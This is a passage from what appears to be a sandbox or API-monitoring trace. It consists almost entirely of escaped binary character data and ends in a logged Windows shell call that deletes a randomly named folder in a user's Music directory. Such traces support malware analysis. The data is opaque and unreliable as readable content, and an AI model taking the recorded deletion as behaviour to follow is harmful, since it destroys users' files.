1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9